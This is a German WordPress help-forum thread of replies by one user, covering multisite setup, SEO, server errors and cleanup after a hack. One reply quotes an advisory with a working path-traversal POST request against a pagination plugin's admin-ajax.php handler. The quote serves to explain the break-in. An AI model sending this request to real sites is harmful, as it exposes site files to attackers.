Beiträge von r23

    Das bedeutet also ich führe einen Hauptblog "A" sowie mehrere Blogs "B" "C" "D" "E", abgtelegt auf eigene Domains oder jeweils Subdomains. In allen Blogs möchte ich Posts erstellen, die dann im jeweiligen Blog sowie im Hauptblog "A" abgebildet und gepostet werden.

    Nein - dies möchtest du nicht - wirklich nicht! da du weder a noch b c d oder e jemals sichtbar für google bekommst.
    http://de.wikipedia.org/wiki/Duplicate_Content


    1. Mit der Blog-Netzwerk / Multiblogfunktion kann ich ein solches Metablog bilden,

    Deine Vorstellung von Blo Netzwerk nennt sich Multisite und funktioniert hier.


    2. Muss ich bei der Einrichtung von wordpress auf meinem Host dann hinsichtlich Domains und Subdomains irgendetwas noch wichtiges beachten?

    du musst für die Domain selber konfigurieren können, was dein Web-Root ist. D.h. a,b,c,d,und e müssen auf ein selber definiertes Verzeichnis zeigen können und wordpress auf diesem Verzeichnis ausliefern können - stark vereinfacht ausgedrückt. Macht nicht jeder Provider.


    Ich möchte halt nur das die Ergebnisse bei Google sauber dargestellt werden und weis nicht voran das hängt. Also wenn ich einen Artikel verfasse und da gleich die Seo Einstellungen vornehme ( Vorschau Suchergebnisse ) dass das dann auch tatsächlich bei Google so angezeigt wird. Tut es aber nicht
    Danke für die Hilfe

    Dies ist halt Google. Ich habe zum Beispiel einmal über das "Time Capsules” Projekt von Andy Warhol geschrieben. Andy Warhol sammelte alles, was ihm in seinem Alltag bewahrenswert erschien, vom wertvollen Gegenstand, beziehungsreichen Zeitungsschnipsel bis zum Souvenir. War eine „Time Capsule“ fertig, wurde sie verschlossen und zu Warhols Lebzeiten nicht mehr geöffnet. Warhol verwendete Umzugskartons und ich ich zeigte Nr. 21 :)

    Shopbetreiber, die für Ihren Shop ein Foto von einem Karton suchten fanden meinen Artikel bei Google. Mit den Suchbegriffen, Time Capsules oder gar Andy Warhol oder Pop Art kam zu diesem Artikel in den letzten Jahren *kein* Besucher über Google.

    Google nimmt deine Beschreibung und würfelt diese mit einer Interpretation der Suche der Google Benutzer.

    Verwende ein Seo-Plugins - erstelle für die Seite eine gute Beschreibung und verzichte auf Meta-Keywords und verschwende deine Zeit nicht mit Google.

    Hallo,


    mein Hoster hat mich informiert, dass derzeit das Admin-PW von WP verstärkt in den Focus von Hackern gerät. Daher würde ich gerne wissen, ob diesbezüglich jemand mehr weiss.

    dann Frage ihn nach seiner Quelle. Wenn es deine Log-Files sind- solltest du deine Sicherheitseinstellungen prüfen. Die hiergenannten Sachen reichen in der Regel dann leider nicht aus.


    Mein PW und auch mein Username sind im Grunde eine wilde Kombination von Zahlen, Buchstaben (gross und klein) und Sonderzeichen. Also viel sicherer kann ich das PW nicht mehr machen.

    Da man vermutlich deine wp-content.php lesen kann hat der Angreifer per se deine Datenbankzugangsdaten und der Angreifer kann vermutlich auf das gespeicherte Passwort zurückgreifen. Hier ist es sehr wichtig, wie das Passwort gespeichert wird:

    Heise schreibt:
    Wordpress und phpBB setzen auf das Framework phpass des Entwicklers Solar Designer – der im Übrigen auch den Passwort-Cracker John the Ripper entwickelt. Phpass setzt standardmäßig auf bcrypt. bcrypt beruht auf dem Blowfish-Algorithmus, bei dem es sich streng genommen gar nicht um einen Hash-, sondern um einen Verschlüsselungsalgorithmus handelt.

    klingt erst einmal super gut... doch dann kommt:
    Fehlt die Implementierung des Blowfish-Algorithmus auf dem System, fällt das phpass-Framework automatisch auf Extended-DES und im Notfall auf MD5 mit Salt und Iterationen zurück.
    und diese Sicherung des Passwortest ist der Grund für die umfangreiche Betrachtung des Artikels:
    http://www.heise.de/security/artik…?artikelseite=3

    An dieser Stelle spielt es keine Rolle, ob die Kombinationen von Zahlen und Buchstaben verwendest, das Passwort steht mehr oder weniger im Klartext in der Datenbank, weil PHP nicht ausreichend konfiguriert wurde.


    Da ich aber auch für Kundenseiten verantwortlich bin, muss ich beim Thema Sicherheit am neuesten Stand sein. Also: Gibts da was Neues oder war das nur eine allgemeine Sicherheitsinfo des Hosters?

    In Jetpack gab es eine Sicherheitslücke.
    http://jetpack.me/2014/04/10/jetpack-security-update/
    =>
    http://blog.wpde.org/2014/04/10/jet…te-updaten.html

    Diese Lücke erlaubt es einen Angreifer die Zugangskontrollen zu umgehen um so Beiträge zu veröffentlichen.

    Sehr viele Plugin-Entwickler lassen sich von jetpack inspirieren...

    es gibt noch weitere Möglichkeiten...


    Wie es sich mir jetzt darstellt war bei mir zumindest das Einfallstor der Ordner /wp-content/uploads/wysija/themes/mailp/

    In das Verzeichnis
    ~/wp-content/uploads/

    kopiert Wordpress die Medien (pdfs, und die Bilder) einige Plugins legen hier in eigenen Verzeichnisen etwas ab.

    d.h. Wordpress hat in diesem Verzeichnis per se schreibrechte. Von diesem Recht wissen auch deine Angreifer.

    D.h. du musst verhindern, dass hochgeladene Scripte (perl. php. ruby.. was weiß ich, was alles bei dir läuft) dort ausgeführt dürfen.
    http://example.org/wp-content/uploads/_dein_script.php darf nicht funktionieren!

    Dein Angreifer hat sich also ein Admin Account eingerichtet? Du kannst keiner Datei (auch keinen Bildern!) mehr trauen.

    Sicherheitslücke kann auch ein uplaod Script in einem Theme oder einem Plugin sein.

    hier eine aktuelle Liste von Sicherheitslücken
    http://www.exploit-db.com/search/?action…ption=wordpress

    Viel Glück

    ralf


    Vor kurzem habe ich ein Update gemacht, das bei der Installation einer neuen Pluginversion abgebrochen ist. Ich bekam dann immer nur eine white page.

    Plugin update oder Wordpress update oder Theme update?



    Also habe ich den Pluginordner umbenannt und der Blog lief wieder.

    mutig - wie kommt man auf solche brutalen Sachen? Und warum sollte jetzt der Blog _laufen_? Alle Plugins werden nicht mehr gefunden, verwendete Shortcodes funktionieren nicht - alle Seo Optimierungen über Plugins sind hin - und alle Content Erweiterungen über Plugins sind nicht mehr funktionsfähig... soetwas nenne ich sicherlich nicht laufen... sondern mutwilliges zerstören.


    Seitdem kann ich mich aber nicht mehr in den Adminbereich einloggen, da ich immer einen 500 Internal Server Error bekomme.

    Dies ist ein „Sammel-Statuscode“ für unerwartete Serverfehler. Wende dich an deinen Provider. Dieser schreibt:

    http://strato-faq.de/article/1377/H…P-Scripten.html

    /*
    Dieser Fehler erscheint, wenn die Zugriffsrechte falsch bzw. nicht gesetzt sind oder wenn sich eine "php.ini"-Datei im Hauptverzeichnis befindet.
    */

    ich kenne zwar andere Gründe - aber wer bei Strato ist - muss damit halt rechnen.


    sorry - da kannst du auch dein Auto waschen, weil es regnet.

    Nach diesem rummfummeln würde ich den ursprünglichen Zustand über ein Backup herstellen.


    Ich bin bei Strato und nutze PHP5.5.

    und deine Theme und dein Plugins kommen mit PHP 5.5.<zahl fehlt natürlich> klar?


    Manchmal erscheint anstatt des 500 Errors auch eine Aufforderung die Datei wp-login.php runterzuladen.

    dann kann dein Sever kein PHP mehr... vermutlich kommt der Fehler nach dieser aktion: definition der php version in der htaccess


    Merkwürdig ist auch, dass ich php-login.php aufrufen kann, wenn ich in der adresszeile des browsers ein www. vor die adresse schreibe.

    www. ist eigentlich Teil einer gültigen Adresse.


    Gebe ich dann aber meine Daten ein und will mich einloggen, dann kommt statt des Adminbereichs wieder der 500 Error oder die Aufforderung wp-admin.php runterzuladen.

    dies würde mich nerven... aber wenn man die htaccess mal eben unbennt - sollte dies doch nicht wundern? In der htaccess werden in der Regel die Permament Links von wordpress aufgelöst und Weiterleitungen zur Vermeidung von doppeltem Content eingerichtet. Die Datei ist super wichtig für Wordpress und den Webserver und sollte man maxiaml verändern aber nicht entfernen.

    wenn du kein Backup hast, mche mal deine Änderungen rückgängig:


    - manuelles deaktivieren der Plugins
    - erhöhen des php memory limits durch php.ini
    - umbenennen der htaccess datei
    - ersetzen der ordner wp-admin und wp-includes mit neu heruntergeladener version
    - definition der php version in der htaccess

    und trage in die wp-config.php den debug-modus von false auf true und wirf einen Blick in die error log datei vom webserver.

    und wende dich an den support von deinem provider - du hast zurzeit ein chaos angerichtet.

    viel glück

    ralf

    aber auch das geht nicht...das problem bleibt das selbe, wie oben beschrieben

    verwende die aktuelle xammp version
    https://www.apachefriends.org/de/index.html

    und die aktuelle wordpress version
    https://wpde.org/download


    [Mon Jul 21 20:08:17.402316 2014] [ssl:warn] [pid 4040:tid 272] AH01909: http://www.example.com:443:0 server certificate does NOT include an ID which matches the server name

    a - verwende localhost in deiner Entwicklungsumgebung. Xampp ist für eine produktiven Umgebung
    meiner Meinung nach ungeeignet ... zuviele Sicherheitslücken...

    b- wenn du ssl verwenden möchtest, musst du ssl konfigurieren.

    http://magento.xonu.de/tutorials/ssl-…che-aktivieren/

    hoffe diese antwort hilft dir weiter

    Hey, in welchem Ordner finde ich die genau? Konnte die in meinem XAMPP-Ordner so nicht finden und auch meine Suchfunktion hat nichts ergeben...

    c:\\xampp\apache\logs

    ich würde einfach die installation noch einmal amchen
    1. wp-config.php löschen
    2. datenbank unter http://localhost/phpmyadmin/ anlegen
    3. http://localhost/wordpress/ aufrufen und wordpress die wp-config.php erstellen lassen

    hoffe die Antwort hilft weiter


    Ralf


    Dort wird einem ja gesagt man solle besser das www. vor der Domain entfernen. Das wollte ich auch machen, aber hier tauchte das erste Problem auf. Wenn ich auf Allgemein -> Einstellungen gehen un die Site-URL ändern will (also das http://www. entfernen) kann ich das so nicht speichern, ich bekomme die Meldung das wäre kein gültiges URL-Format.
    [COLOR=#000000][FONT=Times New Roman][/FONT][/COLOR]

    du sollst nur [COLOR=#ff0000]www[/COLOR] und nicht http://www. entfernen.



    Also habe ich die URL so gelassen und das Netzwerk trotzdem installiert. Jetzt konnte ich zwar eine Subdomain anlegen, aber ich komme nicht in den Adminbereich der Subdomain: http://subdomain.hauptdomain.net/wp-login.php kann nicht gefunden werden.
    Es kommt Not Found
    [COLOR=#000000][FONT=Times New Roman][/FONT][/COLOR]

    weil du ein sinnfreies www. in der Domain hast, fehlt diese in deiner Adresse halt.

    Ich habe mich bereits mit meinem Provider in Verbindung gesetzt (Backups sind vorhanden). Problem ist aber nur dass ich nicht weiß seit wann der Code dadrinne ist, und ich bezweifle dass Provider Backups von vor x Monaten aufbewahren.
    ... welches überall gleich ist (letzte Nacht 2:14)..

    Warum möchtest du Monate zurück wenn ein Tag vermutlich reicht?



    Was sind denn potenzielle Sicherheitslücken? Ich habe nur Wordpress (neuste Version, immer up-to-date) mit ein par AddOns und Themes von der offiziellen WP-Seite installiert...

    Sicherheitslücken sind in den Plugins und den Themes.

    http://www.exploit-db.com/search/?action…r_exploit_text=

    Wenn du etwas Glück hast, kannst du in den Log-files vom WebServer die Spuren erkennen.... gute Angreifer verschleiern ihren Einbruch allerdings.


    Gibt es einen Weg herauszufinden was dieser cryptische Code genau macht?

    in einer geschützen Umgebung ausführen... wenn man wahnsinnig ist ... oder lernen möchte...

    Hallo,


    Aber ich bezweifle dass ich ein brauchbares Backup habe

    normalerweise bucht man dies bei seinem Provider gleich mit. Dieser erstellt dann einmal am Tag ein Backup. Massenhoster und einige merkwürdige Hoster bieten diesen selbstverständlichen Service nicht an - Ich würde mir dann jetzt einen anderen Provider suchen ...



    meinst du es reicht WP einfach hier von der Seite runterzuladen und einfach mal alle Dateien vorsichtshalber zu ersetzen?

    dein Angreifer hat sicherlich auch neue - eigenen Dateien hochgeladen, damit er jederzeit seinen Code neu einbauen kann. Da er schreibrechte hatte - wird er sicherlich noch weiteren blödsinn veranstaltet haben.

    Nein - es reicht leider nicht aus... du kanst leider keine datei und keinem datensatz mehr trauen.
    du solltest auch die Sicherheitslücke finden und beseitigen sonst kommt der Angreifer zurück...

    Die grundsätzliche Frage bleibt aber: Wie kann ein Hacker die htaccess umgehen und Zugriff zum Login bekommen?
    Dieses Leck müsste man finden.

    Vermutlich der übliche weg:

    A non-logged in user can call the ajax function
    wp_ajax_nopriv_ajax_navigation that calls ajax_navigation_callback in
    ajax-pagination-front.php at line 75.
    By setting the value of “loop” in the POST data, they can include the
    contents of that path on the returned page.
    For example, to include the contents of wp-login.php in the returned
    page, send the following:
    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 53
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    paged=2&action=ajax_navigation&loop=../../../wp-login

    Ich binde die wp-login.php und /wp-admin an meine IP (Passwortabfrage ist nichts anderes), absolut problemlos. Welche Probleme sollen damit auftreten?

    es gibt Plugins die verwenden im frontend zum Beispiel

    Code
    wpajax:"/wp-admin/admin-ajax.php",

    wer derartig unsaubere Plugins verwendet, muss halt den admin und weitere Scripte offen halten.

    Woocommerce macht dies zum Beispiel.

    Abteuerlicher finde ich zurzeit xmlrpc... egal.


    http://www.example.org/wp-admin/admin-ajax.php

    funktioniert bei diesen ungeschützen Wordpress Blogs wunderbar.

    Hallo,


    Wenn man die Adresse der Site aufgerufen hat, kam - wie auch sonst üblich - so eine standard-"hier-entsteht-ein-neuer-Webauftritt"-Seite vom Provider. Die habe ich gleich mal via FTP durch eine eigene "coming-soon"-Seite mit Logo und einem kurzen Text ersetzt.

    Damit Wordpress ein "comming-soon" anzeigen kann, kannst du dir das Plugin von Frank installieren:
    http://wordpress.org/plugins/wp-maintenance-mode/

    Deine comming-soon (defautl.html. index.html. odersonstige .htm*) bitte aus dem Verzeichnis löschen.

    Das Plugin WP Wartungsmodus kannst du so konfigurieren, dass du als Admin alle Seiten sehen kannst - gleichzeitig kann du die rechtlichen Pflichtangaben - die auch im comming-soon - mode sichtbar sein sollen - einschalten.

    dein WebServer sollte die index.php ausliefern können.


    ich verwende zum Schutz des Logins zusätzlich eine htaccess-Datei mit sicherem Passwort. Sogar der Benutzername besteht aus mehreren zufälligen Zeichen und steht in keinem Zusammenhang mit Username oder Domain.

    Du wirst vermutlich nur das Verzeichnis /wp-admin/ schützen?



    Frage. Hat das schon einmal jemand festgestellt, dass trotz htaccess-Schutz Einbruchversuche am Login vorgenommen werden? Momentan bin ich ratlos.

    das Login-Script liegt im Documentroot von wordpress und nennt sich wp-login.php

    Die Anmeldung als Admin sollte über eine verschlüsselte SSL-Verbindung erfolgen.